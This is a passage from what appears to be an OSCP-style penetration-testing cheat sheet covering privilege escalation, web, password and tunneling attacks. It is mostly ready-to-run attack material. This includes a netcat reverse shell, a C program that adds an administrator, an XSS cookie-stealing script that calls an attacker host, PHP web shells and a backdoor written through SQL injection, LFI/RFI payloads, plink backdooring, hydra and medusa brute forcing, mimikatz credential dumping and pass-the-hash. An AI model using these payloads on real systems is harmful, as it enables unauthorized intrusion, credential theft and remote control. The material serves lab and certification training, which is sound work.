  1544.                $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
  1545.                $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
  1546.                Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","192.168.1.10","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public
  1547.  
  1548.              Next run this script using powershell.exe:
  1549.  
  1550.              `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"`
  1551.  
  1552.  
  1553. -   Windows Service Configuration Viewer - Check for misconfigurations
  1554.     in services that can lead to privilege escalation. You can replace
  1555.     the executable with your own and have windows execute whatever code
  1556.     you want as the privileged user.  
  1557.     icacls scsiaccess.exe
  1558.  
  1559.          scsiaccess.exe  
  1560.          NT AUTHORITY\SYSTEM:(I)(F)  
  1561.          BUILTIN\Administrators:(I)(F)  
  1562.          BUILTIN\Users:(I)(RX)  
  1563.          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)  
  1564.          Everyone:(I)(F)
  1565.  
  1566. -   Compile a custom add user command in windows using C  
  1567.  
  1568.              root@kali:~\# cat useradd.c  
  1569.              #include <stdlib.h> /* system, NULL, EXIT_FAILURE */  
  1570.              int main ()  
  1571.              {  
  1572.              int i;  
  1573.              i=system ("net localgroup administrators low /add");  
  1574.              return 0;  
  1575.              }  
  1576.  
  1577.              i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
  1578.  
  1579. -   Group Policy Preferences (GPP)  
  1580.     A common useful misconfiguration found in modern domain environments
  1581.     is unprotected Windows GPP settings files
  1582.  
  1583.     -   map the Domain controller SYSVOL share  
  1584.        
  1585.         `net use z:\\dc01\SYSVOL`
  1586.  
  1587.     -   Find the GPP file: Groups.xml  
  1588.        
  1589.         `dir /s Groups.xml`
  1590.  
  1591.     -   Review the contents for passwords  
  1592.        
  1593.         `type Groups.xml`
  1594.  
  1595.     -   Decrypt using GPP Decrypt  
  1596.        
  1597.         `gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB`
  1598.        
  1599. -   Find and display the proof.txt or flag.txt - get the loot!
  1600.    
  1601.     `#meterpreter  >     run  post/windows/gather/win_privs`
  1602.     `cd\ & dir /b /s proof.txt`
  1603.     `type c:\pathto\proof.txt`
  1604.    
  1605.  
  1606. Client, Web and Password Attacks
  1607. ==============================================================================================================================
  1608.  
  1609. -   <span id="_pcjm0n4oppqx" class="anchor"><span id="_Toc480741817" class="anchor"></span></span>Client Attacks
  1610.     ------------------------------------------------------------------------------------------------------------
  1611.  
  1612.     -   MS12-037- Internet Explorer 8 Fixed Col Span ID  
  1613.         wget -O exploit.html
  1614.         <http://www.exploit-db.com/download/24017>  
  1615.         service apache2 start
  1616.  
  1617.     -   JAVA Signed Jar client side attack  
  1618.         echo '<applet width="1" height="1" id="Java Secure"
  1619.         code="Java.class" archive="SignedJava.jar"><param name="1"
  1620.         value="http://$ip:80/evil.exe"></applet>' >
  1621.         /var/www/html/java.html  
  1622.         User must hit run on the popup that occurs.
  1623.  
  1624.     -   Linux Client Shells  
  1625.         [*http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/*](http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/)
  1626.  
  1627.     -   Setting up the Client Side Exploit
  1628.  
  1629.     -   Swapping Out the Shellcode
  1630.  
  1631.     -   Injecting a Backdoor Shell into Plink.exe  
  1632.         backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip
  1633.         -P 4444 -s reverse\_shell\_tcp
  1634.  
  1635. -   <span id="_n6fr3j21cp1m" class="anchor"><span id="_Toc480741818" class="anchor"></span></span>Web Attacks
  1636.     ---------------------------------------------------------------------------------------------------------
  1637.  
  1638.     -   Web Shag Web Application Vulnerability Assessment Platform  
  1639.         webshag-gui
  1640.  
  1641.     -   Web Shells  
  1642.         [*http://tools.kali.org/maintaining-access/webshells*](http://tools.kali.org/maintaining-access/webshells)  
  1643.         ls -l /usr/share/webshells/
  1644.  
  1645.     -   Generate a PHP backdoor (generate) protected with the given
  1646.         password (s3cr3t)  
  1647.         weevely generate s3cr3t  
  1648.         weevely http://$ip/weevely.php s3cr3t
  1649.  
  1650.     -   Java Signed Applet Attack
  1651.  
  1652.     -   HTTP / HTTPS Webserver Enumeration
  1653.  
  1654.         -   OWASP Dirbuster
  1655.  
  1656.         -   nikto -h $ip
  1657.  
  1658.     -   Essential Iceweasel Add-ons  
  1659.         Cookies Manager
  1660.         https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/  
  1661.         Tamper Data  
  1662.         https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
  1663.  
  1664.     -   Cross Site Scripting (XSS)  
  1665.         significant impacts, such as cookie stealing and authentication
  1666.         bypass, redirecting the victim’s browser to a malicious HTML
  1667.         page, and more
  1668.  
  1669.     -   Browser Redirection and IFRAME Injection  
  1670.         <iframe SRC="http://$ip/report" height = "0" width
  1671.         ="0"></iframe>
  1672.  
  1673.     -   Stealing Cookies and Session Information  
  1674.         <script>  
  1675.         new
  1676.         image().src="http://$ip/bogus.php?output="+document.cookie;  
  1677.         </script>  
  1678.         nc -nlvp 80
  1679.  
  1680. -   File Inclusion Vulnerabilities
  1681.     -----------------------------------------------------------------------------------------------------------------------------
  1682.  
  1683.     -   Local (LFI) and remote (RFI) file inclusion vulnerabilities are
  1684.         commonly found in poorly written PHP code.
  1685.  
  1686.     -   fimap - There is a Python tool called fimap which can be
  1687.         leveraged to automate the exploitation of LFI/RFI
  1688.         vulnerabilities that are found in PHP (sqlmap for LFI):  
  1689.         [*https://github.com/kurobeats/fimap*](https://github.com/kurobeats/fimap)
  1690.  
  1691.         -   Gaining a shell from phpinfo()  
  1692.             fimap + phpinfo() Exploit - If a phpinfo() file is present,
  1693.             it’s usually possible to get a shell, if you don’t know the
  1694.             location of the phpinfo file fimap can probe for it, or you
  1695.             could use a tool like OWASP DirBuster.
  1696.  
  1697.     -   For Local File Inclusions look for the include() function in PHP
  1698.         code.  
  1699.         include("lang/".$\_COOKIE\['lang'\]);  
  1700.         include($\_GET\['page'\].".php");
  1701.  
  1702.     -   LFI - Encode and Decode a file using base64  
  1703.         curl -s
  1704.         http://$ip/?page=php://filter/convert.base64-encode/resource=index
  1705.         | grep -e '\[^\\ \]\\{40,\\}' | base64 -d
  1706.  
  1707.     -   LFI - Download file with base 64 encoding  
  1708.         [*http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php*](about:blank)
  1709.  
  1710.     -   LFI Linux Files:  
  1711.         /etc/issue  
  1712.         /proc/version  
  1713.         /etc/profile  
  1714.         /etc/passwd  
  1715.         /etc/passwd  
  1716.         /etc/shadow  
  1717.         /root/.bash\_history  
  1718.         /var/log/dmessage  
  1719.         /var/mail/root  
  1720.         /var/spool/cron/crontabs/root
  1721.  
  1722.     -   LFI Windows Files:  
  1723.         %SYSTEMROOT%\\repair\\system  
  1724.         %SYSTEMROOT%\\repair\\SAM  
  1725.         %SYSTEMROOT%\\repair\\SAM  
  1726.         %WINDIR%\\win.ini  
  1727.         %SYSTEMDRIVE%\\boot.ini  
  1728.         %WINDIR%\\Panther\\sysprep.inf  
  1729.         %WINDIR%\\system32\\config\\AppEvent.Evt
  1730.  
  1731.     -   LFI OSX Files:  
  1732.         /etc/fstab  
  1733.         /etc/master.passwd  
  1734.         /etc/resolv.conf  
  1735.         /etc/sudoers  
  1736.         /etc/sysctl.conf
  1737.  
  1738.     -   LFI - Download passwords file  
  1739.         [*http://$ip/index.php?page=/etc/passwd*](about:blank)  
  1740.         [*http://$ip/index.php?file=../../../../etc/passwd*](about:blank)
  1741.  
  1742.     -   LFI - Download passwords file with filter evasion  
  1743.         [*http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd*](about:blank)
  1744.  
  1745.     -   Local File Inclusion - In versions of PHP below 5.3 we can
  1746.         terminate with null byte  
  1747.         GET
  1748.         /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
  1749.  
  1750.     -   Contaminating Log Files `<?php echo shell_exec($_GET['cmd']);?>`
  1751.  
  1752.     -   For a Remote File Inclusion look for php code that is not  sanitized and passed to the PHP include function and the php.ini
  1753.         file must be configured to allow remote files
  1754.        
  1755.         */etc/php5/cgi/php.ini* - "allow_url_fopen" and "allow_url_include" both set to "on"  
  1756.        
  1757.         `include($_REQUEST["file"].".php");`
  1758.  
  1759.     -   Remote File Inclusion  
  1760.    
  1761.          `http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt `
  1762.        
  1763.          `<?php echo shell\_exec("ipconfig");?>`
  1764.  
  1765. -   <span id="_mgu7e3u7svak" class="anchor"><span id="_Toc480741820" class="anchor"></span></span>Database Vulnerabilities
  1766.     ----------------------------------------------------------------------------------------------------------------------
  1767.  
  1768.     -   Grab password hashes from a web application mysql database called “Users” - once you have the MySQL root username and        password  
  1769.    
  1770.               mysql -u root -p -h $ip
  1771.               use "Users"  
  1772.               show tables;  
  1773.               select \* from users;
  1774.  
  1775.     -   Authentication Bypass  
  1776.    
  1777.               name='wronguser' or 1=1;  
  1778.               name='wronguser' or 1=1 LIMIT 1;
  1779.  
  1780.     -   Enumerating the Database  
  1781.    
  1782.         `http://192.168.11.35/comment.php?id=738)'`  
  1783.        
  1784.         Verbose error message?  
  1785.        
  1786.         `http://$ip/comment.php?id=738 order by 1`
  1787.        
  1788.         `http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6  `
  1789.        
  1790.         Determine MySQL Version:  
  1791.        
  1792.         `http://$ip/comment.php?id=738 union all select 1,2,3,4,@@version,6  `
  1793.        
  1794.         Current user being used for the database connection:
  1795.        
  1796.         `http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6  `
  1797.        
  1798.         Enumerate database tables and column structures  
  1799.        
  1800.         `http://$ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables  `
  1801.        
  1802.         Target the users table in the database  
  1803.        
  1804.         `http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where        table_name='users'  `
  1805.        
  1806.         Extract the name and password  
  1807.        
  1808.         `http://$ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users `
  1809.        
  1810.         Create a backdoor
  1811.        
  1812.         `http://$ip/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE        'c:/xampp/htdocs/backdoor.php'`
  1813.        
  1814.  
  1815.     -   **SQLMap Examples**
  1816.  
  1817.       - Crawl the links
  1818.      
  1819.          `sqlmap -u http://$ip --crawl=1`
  1820.          
  1821.          `sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3`
  1822.          
  1823.          
  1824.       - SQLMap Search for databases against a suspected GET SQL Injection
  1825.      
  1826.         `sqlmap –u http://$ip/blog/index.php?search –dbs`
  1827.  
  1828.       - SQLMap dump tables from database oscommerce at GET SQL injection
  1829.      
  1830.         `sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables –dumps `
  1831.      
  1832.       - SQLMap GET Parameter command  
  1833.      
  1834.          `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump -threads=5  `
  1835.          
  1836.       - SQLMap Post Username parameter
  1837.      
  1838.           `sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --dump-all`
  1839.            
  1840.       - SQL Map OS Shell
  1841.            
  1842.           `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell  `
  1843.      
  1844.           `sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --os-shell`
  1845.            
  1846.        - Automated sqlmap scan
  1847.        
  1848.           `sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords  --file-read="/var/www/blah.php"`
  1849.              
  1850.         - Targeted sqlmap scan
  1851.        
  1852.            `sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump`
  1853.              
  1854.          - Scan url for union + error based injection with mysql backend and use a random user agent + database dump  
  1855.          
  1856.             `sqlmap -o -u http://$ip/index.php --forms --dbs  `
  1857.                
  1858.             `sqlmap -o -u "http://$ip/form/" --forms`
  1859.                
  1860.           - Sqlmap check form for injection  
  1861.          
  1862.              `sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump`
  1863.                  
  1864.            - Enumerate databases  
  1865.            
  1866.               `sqlmap --dbms=mysql -u "$URL" --dbs`
  1867.                
  1868.             - Enumerate tables from a specific database  
  1869.                  
  1870.               `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables  `
  1871.                  
  1872.             - Dump table data from a specific database and table  
  1873.            
  1874.                `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump `
  1875.                    
  1876.             - Specify parameter to exploit  
  1877.              
  1878.                `sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2 `
  1879.                    
  1880.             - Specify parameter to exploit in 'nice' URIs (exploits param1)
  1881.              
  1882.                 `sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs `
  1883.                      
  1884.             - Get OS shell  
  1885.              
  1886.                  `sqlmap --dbms=mysql -u "$URL" --os-shell`
  1887.                        
  1888.             - Get SQL shell  
  1889.                        
  1890.                  `sqlmap --dbms=mysql -u "$URL" --sql-shell`
  1891.                        
  1892.              - SQL query  
  1893.                
  1894.                 `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"`
  1895.                          
  1896.              - Use Tor Socks5 proxy  
  1897.                  
  1898.                 `sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs`
  1899.        
  1900.        
  1901. -   **NoSQLMap Examples**
  1902.        You may encounter NoSQL instances like MongoDB in your OSCP journies (`/cgi-bin/mongo/2.2.3/dbparse.py`).  NoSQLMap can help you to automate NoSQLDatabase enumeration.
  1903.        
  1904.   -   NoSQLMap Installation
  1905.        
  1906.             git clone https://github.com/codingo/NoSQLMap.git
  1907.             cd NoSQLMap/
  1908.             ls
  1909.             pip install couchdb
  1910.             pip install pbkdf2
  1911.             pip install ipcalc
  1912.             python nosqlmap.py --help
  1913.  
  1914. -   Password Attacks
  1915.     --------------------------------------------------------------------------------------------------------------
  1916.  
  1917.     -   AES Decryption  
  1918.         http://aesencryption.net/
  1919.  
  1920.     -   Convert multiple webpages into a word list  
  1921.         for x in 'index' 'about' 'post' 'contact' ; do curl
  1922.         http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >>
  1923.         webapp.txt ; done
  1924.  
  1925.     -   Or convert html to word list dict  
  1926.         html2dic index.html.out | sort -u > index-html.dict
  1927.  
  1928.     -   Default Usernames and Passwords
  1929.  
  1930.         -   CIRT  
  1931.             [*http://www.cirt.net/passwords*](http://www.cirt.net/passwords)
  1932.  
  1933.         -   Government Security - Default Logins and Passwords for
  1934.             Networked Devices
  1935.  
  1936.         -   [*http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php*](http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php)
  1937.  
  1938.         -   Virus.org  
  1939.             [*http://www.virus.org/default-password/*](http://www.virus.org/default-password/)
  1940.  
  1941.         -   Default Password  
  1942.             [*http://www.defaultpassword.com/*](http://www.defaultpassword.com/)
  1943.  
  1944.     -   Brute Force
  1945.  
  1946.         -   Nmap Brute forcing Scripts  
  1947.             [*https://nmap.org/nsedoc/categories/brute.html*](https://nmap.org/nsedoc/categories/brute.html)
  1948.  
  1949.         -   Nmap Generic auto detect brute force attack  
  1950.             nmap --script brute -Pn <target.com or ip>
  1951.             <enter>
  1952.  
  1953.         -   MySQL nmap brute force attack  
  1954.             nmap --script=mysql-brute $ip
  1955.  
  1956.     -   Dictionary Files
  1957.  
  1958.         -   Word lists on Kali  
  1959.             cd /usr/share/wordlists
  1960.  
  1961.     -   Key-space Brute Force
  1962.  
  1963.         -   crunch 6 6 0123456789ABCDEF -o crunch1.txt
  1964.  
  1965.         -   crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
  1966.  
  1967.         -   crunch 8 8 -t ,@@^^%%%
  1968.  
  1969.     -   Pwdump and Fgdump - Security Accounts Manager (SAM)
  1970.  
  1971.         -   pwdump.exe - attempts to extract password hashes
  1972.  
  1973.         -   fgdump.exe - attempts to kill local antiviruses before
  1974.             attempting to dump the password hashes and
  1975.             cached credentials.
  1976.  
  1977.     -   Windows Credential Editor (WCE)
  1978.  
  1979.         -   allows one to perform several attacks to obtain clear text
  1980.             passwords and hashes
  1981.  
  1982.         -   wce -w
  1983.  
  1984.     -   Mimikatz
  1985.  
  1986.         -   extract plaintexts passwords, hash, PIN code and kerberos
  1987.             tickets from memory. mimikatz can also perform
  1988.             pass-the-hash, pass-the-ticket or build Golden tickets  
  1989.             [*https://github.com/gentilkiwi/mimikatz*](https://github.com/gentilkiwi/mimikatz)
  1990.             From metasploit meterpreter (must have System level access):
  1991.             `meterpreter> load mimikatz
  1992.             meterpreter> help mimikatz
  1993.             meterpreter> msv
  1994.             meterpreter> kerberos
  1995.             meterpreter> mimikatz_command -f samdump::hashes
  1996.             meterpreter> mimikatz_command -f sekurlsa::searchPasswords`
  1997.  
  1998.     -   Password Profiling
  1999.  
  2000.         -   cewl can generate a password list from a web page  
  2001.             `cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt`
  2002.  
  2003.     -   Password Mutating
  2004.  
  2005.         -   John the ripper can mutate password lists  
  2006.             nano /etc/john/john.conf  
  2007.             `john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt`
  2008.  
  2009.     -   Medusa
  2010.  
  2011.         -   Medusa, initiated against an htaccess protected web
  2012.             directory  
  2013.             `medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10`
  2014.  
  2015.     -   Ncrack
  2016.  
  2017.         -   ncrack (from the makers of nmap) can brute force RDP  
  2018.             `ncrack -vv --user offsec -P password-file.txt rdp://$ip`
  2019.  
  2020.     -   Hydra
  2021.  
  2022.         -   Hydra brute force against SNMP  
  2023.             `hydra -P password-file.txt -v $ip snmp`
  2024.  
  2025.         -   Hydra FTP known user and password list  
  2026.             `hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp`
  2027.  
  2028.         -   Hydra SSH using list of users and passwords  
  2029.             `hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh`
  2030.  
  2031.         -   Hydra SSH using a known password and a username list  
  2032.             `hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh`
  2033.  
  2034.         -   Hydra SSH Against Known username on port 22
  2035.             `hydra $ip -s 22 ssh -l <user> -P big\_wordlist.txt`
  2036.  
  2037.         -   Hydra POP3 Brute Force  
  2038.             `hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V`
  2039.  
  2040.         -   Hydra SMTP Brute Force  
  2041.             `hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V`
  2042.  
  2043.         -   Hydra attack http get 401 login with a dictionary  
  2044.             `hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin`
  2045.            
  2046.         -   Hydra attack Windows Remote Desktop with rockyou
  2047.             `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip`
  2048.            
  2049.         -   Hydra brute force a Wordpress admin login
  2050.             `hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`
  2051.  
  2052.          
  2053.  
  2054. -   <span id="_bnmnt83v58wk" class="anchor"><span id="_Toc480741822" class="anchor"></span></span>Password Hash Attacks
  2055.     -------------------------------------------------------------------------------------------------------------------
  2056.  
  2057.     -   Online Password Cracking  
  2058.         [*https://crackstation.net/*](https://crackstation.net/)
  2059.  
  2060.     -   Hashcat
  2061.    Needed to install new drivers to get my GPU Cracking to work on the Kali linux VM and I also had to use the --force parameter.
  2062. apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev
  2063. and
  2064. apt-get install pocl-opencl-icd
  2065.  
  2066.    Cracking Linux Hashes - /etc/shadow file
  2067.    ```
  2068.    500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems
  2069.    3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems
  2070.    7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems
  2071.    1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems
  2072.    ```
  2073.    Cracking Windows Hashes
  2074.    ```
  2075.    3000 | LM                                               | Operating-Systems
  2076.    1000 | NTLM                                             | Operating-Systems
  2077.    ```
  2078.    Cracking Common Application Hashes
  2079.    ```
  2080.     900 | MD4                                              | Raw Hash
  2081.       0 | MD5                                              | Raw Hash
  2082.    5100 | Half MD5                                         | Raw Hash
  2083.     100 | SHA1                                             | Raw Hash
  2084.   10800 | SHA-384                                          | Raw Hash
  2085.    1400 | SHA-256                                          | Raw Hash
  2086.    1700 | SHA-512                                          | Raw Hash
  2087.    ```
  2088.    
  2089.    Create a .hash file with all the hashes you want to crack
  2090.    puthasheshere.hash:
  2091.    ```
  2092.    $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/
  2093.    ```
  2094.    
  2095.    Hashcat example cracking Linux md5crypt passwords $1$ using rockyou:
  2096.    
  2097.    `hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt`
  2098.    
  2099.    Wordpress sample hash: $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/
  2100.    
  2101.    Wordpress clear text: test
  2102.    
  2103.    Hashcat example cracking Wordpress passwords using rockyou:
  2104.    
  2105.   `hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt`
  2106.  
  2107.     -   Sample Hashes  
  2108.         [*http://openwall.info/wiki/john/sample-hashes*](http://openwall.info/wiki/john/sample-hashes)
  2109.  
  2110.     -   Identify Hashes  
  2111.    
  2112.         `hash-identifier`
  2113.  
  2114.     -   To crack linux hashes you must first unshadow them:  
  2115.    
  2116.         `unshadow passwd-file.txt shadow-file.txt  `
  2117.         `unshadow passwd-file.txt shadow-file.txt > unshadowed.txt`
  2118.  
  2119. -   John the Ripper - Password Hash Cracking
  2120.  
  2121.     -   `john $ip.pwdump`
  2122.  
  2123.     -   `john --wordlist=/usr/share/wordlists/rockyou.txt hashes`
  2124.  
  2125.     -   `john --rules --wordlist=/usr/share/wordlists/rockyou.txt`
  2126.  
  2127.     -   `john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt`
  2128.  
  2129.     -   JTR forced descrypt cracking with wordlist  
  2130.    
  2131.         `john --format=descrypt --wordlist  /usr/share/wordlists/rockyou.txt hash.txt`
  2132.  
  2133.     -   JTR forced descrypt brute force cracking  
  2134.    
  2135.         `john --format=descrypt hash --show`
  2136.  
  2137. -   Passing the Hash in Windows
  2138.  
  2139.     -   Use Metasploit to exploit one of the SMB servers in the labs.
  2140.         Dump the password hashes and attempt a pass-the-hash attack
  2141.         against another system:  
  2142.          
  2143.         `export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896 `
  2144.          
  2145.         `pth-winexe -U administrator //$ip cmd`
  2146.  
  2147. <span id="_6nmbgmpltwon" class="anchor"><span id="_Toc480741823" class="anchor"></span></span>Networking, Pivoting and Tunneling
  2148. ================================================================================================================================
  2149.  
  2150. -   Port Forwarding - accept traffic on a given IP address and port and
  2151.     redirect it to a different IP address and port
  2152.  
  2153.     -   `apt-get install rinetd`
  2154.  
  2155.     -   `cat /etc/rinetd.conf  `
  2156.         `\# bindadress bindport connectaddress connectport `
  2157.         `w.x.y.z 53 a.b.c.d 80`
  2158.  
  2159. -   SSH Local Port Forwarding: supports bi-directional communication
  2160.     channels
  2161.  
  2162.     -   `ssh <gateway> -L <local port to listen>:<remote
  2163.         host>:<remote port>`
  2164.  
  2165. -   SSH Remote Port Forwarding: Suitable for popping a remote shell on
  2166.     an internal non routable network
  2167.  
  2168.     -   `ssh <gateway> -R <remote port to bind>:<local
  2169.         host>:<local port>`
  2170.  
  2171. -   SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local
  2172.     attacking box to tunnel ALL incoming traffic to ANY host in the DMZ
  2173.     network on ANY PORT
  2174.  
  2175.     -   `ssh -D <local proxy port> -p <remote port>
  2176.         <target>`
  2177.  
  2178. -   Proxychains - Perform nmap scan within a DMZ from an external
  2179.     computer
  2180.  
  2181.     -   Create reverse SSH tunnel from Popped machine on :2222  
  2182.        
  2183.         `ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com`
  2184.         `ssh -f -N -R 2222:<local host>:22 root@<remote host>`
  2185.  
  2186.     -   Create a Dynamic application-level port forward on 8080 thru
  2187.         2222  
  2188.        
  2189.         `ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>`
  2190.  
  2191.     -   Leverage the SSH SOCKS server to perform Nmap scan on network
  2192.         using proxy chains  
  2193.        
  2194.         `proxychains nmap --top-ports=20 -sT -Pn $ip/24`
  2195.  
  2196. -   HTTP Tunneling  
  2197.      
  2198.       `nc -vvn $ip 8888`
  2199.  
  2200. -   Traffic Encapsulation - Bypassing deep packet inspection
  2201.  
  2202.     -   http tunnel  
  2203.         On server side:  
  2204.         `sudo hts -F <server ip addr>:<port of your app> 80  `
  2205.         On client side:  
  2206.         `sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel`
  2207.  
  2208. -   Tunnel Remote Desktop (RDP) from a Popped Windows machine to your
  2209.     network
  2210.  
  2211.     -   Tunnel on port 22  
  2212.    
  2213.         `plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>`
  2214.  
  2215.     -   Port 22 blocked? Try port 80? or 443?  
  2216.    
  2217.         `plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80`
  2218.  
  2219. -   Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel
  2220.     (bypass deep packet inspection)
  2221.  
  2222.     -   Windows machine add required firewall rules without prompting the user
  2223.  
  2224.     -   `netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes`
  2225.  
  2226.     -   `netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000`
  2227.  
  2228.     -   `netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080`
  2229.  
  2230.     -   `netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079`
  2231.  
  2232.     -   Start the http tunnel client  
  2233.    
  2234.          `httptunnel_client.exe`
  2235.  
  2236.     -   Create HTTP reverse shell by connecting to localhost port 3000  
  2237.    
  2238.         `plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000`
  2239.  
  2240. -   VLAN Hopping
  2241.  
  2242.     -   `git clone https://github.com/nccgroup/vlan-hopping.git  
  2243.         chmod 700 frogger.sh  
  2244.         ./frogger.sh`
  2245.        
  2246.  
  2247. -   VPN Hacking
  2248.  
  2249.     -   Identify VPN servers:  
  2250.         `./udp-protocol-scanner.pl -p ike $ip`
  2251.  
  2252.     -   Scan a range for VPN servers:  
  2253.         `./udp-protocol-scanner.pl -p ike -f ip.txt`
  2254.  
  2255.     -   Use IKEForce to enumerate or dictionary attack VPN servers:  
  2256.    
  2257.         `pip install pyip`  
  2258.        
  2259.         `git clone https://github.com/SpiderLabs/ikeforce.git  `
  2260.        
  2261.         Perform IKE VPN enumeration with IKEForce:  
  2262.        
  2263.         `./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic  `
  2264.        
  2265.         Bruteforce IKE VPN using IKEForce:  
  2266.        
  2267.         `./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1  `
  2268.         Use ike-scan to capture the PSK hash:  
  2269.        
  2270.         `ike-scan  
  2271.         ike-scan TARGET-IP  
  2272.         ike-scan -A TARGET-IP  
  2273.         ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key  
  2274.         ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP  `
  2275.         Use psk-crack to crack the PSK hash  
  2276.        
  2277.         `psk-crack hash-file.txt  
  2278.         pskcrack  
  2279.         psk-crack -b 5 TARGET-IPkey  
  2280.         psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key  
  2281.         psk-crack -d /path/to/dictionary-file TARGET-IP-key`
  2282.  
  2283. -   PPTP Hacking
  2284.  
  2285.     -   Identifying PPTP, it listens on TCP: 1723  
  2286.         NMAP PPTP Fingerprint:  
  2287.        
  2288.         `nmap –Pn -sV -p 1723 TARGET(S)  `
  2289.         PPTP Dictionary Attack  
  2290.        
  2291.         `thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst`
  2292.  
  2293. -   Port Forwarding/Redirection
  2294.  
  2295. -   PuTTY Link tunnel - SSH Tunneling
  2296.  
  2297.     -   Forward remote port to local address:  
  2298.    
  2299.          `plink.exe -P 22 -l root -pw "1337" -R 445:<local host>:445 <remote host>`
